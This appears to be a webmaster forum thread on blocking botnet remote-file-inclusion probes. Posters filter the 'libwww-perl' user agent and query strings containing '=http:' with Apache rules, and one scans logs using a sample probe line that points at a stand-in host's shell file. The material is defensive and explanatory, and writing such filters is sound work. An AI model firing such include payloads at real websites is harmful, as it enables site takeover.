Forum Moderators: open
#1 - Most botnet scripts don't set the user agent, so it stays at the library default, typically "libwww-perl".
#2 - The QUERY_STRING will almost always contain "=http:" that points to the file the botnet is trying to upload into the website.
Knowing this you can protect most websites from the most automated website vulnerability attacks by simply blocking all "libwww-perl" access and any QUERY_STRING that contains "=http:" in the parameter list.
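For an Apache server, a minimal sketch of both blocks might look like this in .htaccess (mod_rewrite assumed enabled; the exact patterns and the 403 response are my choices, so test before rolling it out server-wide):

```apache
RewriteEngine On
# Block the default libwww-perl user agent, case-insensitively
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]
# Block any query string carrying "=http:" (a remote-include probe)
RewriteCond %{QUERY_STRING} =https?: [NC]
# Return 403 Forbidden for anything matching either condition
RewriteRule .* - [F]
```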
Most software that permits file uploads uses a POST, so filtering out "=http:" in the QUERY_STRING should have no effect on any sites, except possibly stopping them from being hacked.
FWIW, if I were running a shared hosting company I would block these 2 things by default server wide just to help keep it clean. If blocking those 2 things causes customers any problems with real software, then it's time they fixed their software to use descriptive user agents and only permit file paths via POSTs.
Obviously the botnets can adapt to avoid the user agent trap and use POSTs, but that's no reason not to apply this level of security server-wide today as it will block a large percentage of what's being used today.
Blocking these 2 things just may buy you some time from when the vulnerability is posted to the time you or your customers get around to installing the fix without being hacked.
I've added the block for QUERY_STRING containing "=http:" and will see how it goes over the next week or so.
Actually, I've never seen this query yet, but I probably miss more than I think.
Wouldn't it be better to just block all libwww user agent requests?
SetEnvIfNoCase User-Agent "libwww" bad_bot
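That line only sets the environment variable; a sketch of the deny logic that would go with it, assuming Apache 2.2-era mod_access syntax (adjust for your own setup):

```apache
# Flag any request whose user agent contains "libwww"
SetEnvIfNoCase User-Agent "libwww" bad_bot
# With Order Allow,Deny, a matching Deny overrides the Allow
Order Allow,Deny
Allow from all
Deny from env=bad_bot
```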
But it can be pretty hard to identify the query strings that should be allowed unless you wrote the script yourself. For complex third-party scripts, you pretty much have to allow all query strings if you want them to work properly, so filtering the query string just won't work there.
But it can be pretty hard to identify the query strings that should be allowed unless you wrote the script yourself.
Most query strings don't include file names; that's usually done via POST.
Besides, if a script doesn't do it that way, you need to harass your script provider to change it, as all the vulnerability probes use URLs in the query string and it's just to be avoided IMO.
Besides, all the stupid RSS readers can fix their stinking scripts to identify themselves with the following line of Perl code:
$ua->agent("MyRSSReader");
Sloppy and lazy programming is never an excuse for allowing a default user agent from a toolkit access to your server. If the programmer isn't bright enough to change it then whatever he/she wrote probably shouldn't be hitting the web in the first place, not my server anyway.
Besides, all the stupid RSS readers can fix their stinking scripts to identify themselves with the following line of Perl code:
$ua->agent("MyRSSReader");
Sloppy and lazy programming is never an excuse for allowing a default user agent from a toolkit access to your server. If the programmer isn't bright enough to change it then whatever he/she wrote probably shouldn't be hitting the web in the first place, not my server anyway.
Not my server either (I write most of my software myself in C++, including my main web server). But the fact is that there are just too many badly written programs and scripts out there, and the best defense is to avoid them altogether in the first place rather than trying to reduce their damage by adding another layer of protection like filtering the query strings.
Yet I agree with you that if a badly written script can't be avoided for some reason, and if the author won't or can't fix it for whatever reason, then it makes sense to do everything possible to reduce the potential damage.
But even if they change the UA string, won't the crackers change theirs too?
The libwww-perl filter won't last forever; it only catches the lazy ones now, since the smart ones already use something else. But that's no different than using filters to stop scrapers with broken MSIE UAs: the dumb ones just keep using them, the smart ones adapt.
Doesn't mean you shouldn't block the dumb ones as they're easy pick'n.
However, changing the libwww-perl user agent still won't get past the filter on "http" in the query string, which is the true vulnerability.
Doesn't mean you shouldn't block the dumb ones as they're easy pick'n.
Agreed.
However, changing the libwww-perl user agent still won't get past the filter on "http" in the query string, which is the true vulnerability.
Agreed. But I'd rather advise webmasters to get rid of the vulnerable script altogether if they can, especially if it is a complex third party script where they might have a hard time figuring out which query strings are safe and which are unsafe.
If they try to block all query strings because they can't distinguish the safe from the unsafe, there is no guarantee that the script will continue to work as intended or that webmasters will notice the breakage right away.
And if the script stops working as intended, couldn't that potentially open up other holes as well? After all, we agreed that the code was badly written to begin with, so breaking it in any way must be considered risky business. I can give a hypothetical example of this if you want.
But I'd rather advise webmasters to get rid of the vulnerable script altogether if they can, especially if it is a complex third party script where they might have a hard time figuring out which query strings are safe and which are unsafe.
How would you advise webmasters, when many people that own web sites don't even bother looking in forums or anything on a regular basis? Shared hosting farms would just be wise to plug the hole and deal with the fallout of any broken scripts after the fact.
Likewise, how do you know which scripts are vulnerable so you can advise them to get rid of them in the first place?
Do you really think people are just going to toss Joomla, WordPress or Photo Cart, all of which have been vulnerable to this particular threat?
I seriously doubt that's going to happen. But the point is that the ability to upload a file, which many scripts use for installing add-on components, is the root of the problem they all share in common, and it's a huge exploit at this time.
You can either:
a) heed my advice and eliminate file upload vulnerability probes, which may break a script or two until the authors can be compelled to fix it securely, or...
b) allow http paths in the query_string and roll the dice until you get hacked
I'll opt for "a" so that the automated botnets don't know I'm vulnerable.
FWIW, many of the more recent probes I've been watching don't even have the target script physically set to upload at the point of the vulnerability probe. They appear to be building a list of sites that respond positively to the probe so they can come back and hack you later. That means you won't even know you're a vulnerable target until much later, compared to some of the botnet probes I've seen in the past that infiltrated the server on initial contact.
You may be on the list to be hacked at this very minute and not know it!
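If you want to check whether you've already been probed, a rough sketch of a log scan for "=http:" in the query string (the sample log lines and the /tmp path are made up for illustration; point the grep at your real access log and adapt the pattern to your log format):

```shell
# Sketch: count access-log lines whose query string carries "=http:"
# (plain or URL-encoded %3A). The sample log stands in for a real one.
cat <<'EOF' > /tmp/sample_access.log
1.2.3.4 - - [11/May/2007:10:00:00 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
5.6.7.8 - - [11/May/2007:10:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
EOF
grep -Ec '\?[^" ]*=http(s)?(:|%3[Aa])' /tmp/sample_access.log
# prints: 1
```

Only the first sample line matches, since the second has no "=http:" in its query string.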
Shared hosting farms would just be wise to plug the hole and deal with the fallout of any broken scripts after the fact.
That's pretty good advice, except when the fallout is such that the broken scripts open up more security holes that webhosts didn't even know existed before they tried to plug the hole. Blocking query strings indiscriminately can have unintended security repercussions because the breakage is exploitable in theory, so some caution should be advocated.
Do you really think people just going to toss Joomla, Word Press or Photo Cart, all of which have been vulnerable to this particular threat?
You may be on the list to be hacked at this very minute and not know it!
FWIW and from my POV, I don't see any disagreement between us on this topic: you are telling webmasters how to hit the nail on the head to solve the problem, and I'm telling them how to avoid hitting their fingers too in the process. Surely we can conclude this topic on that friendly agreement, can't we?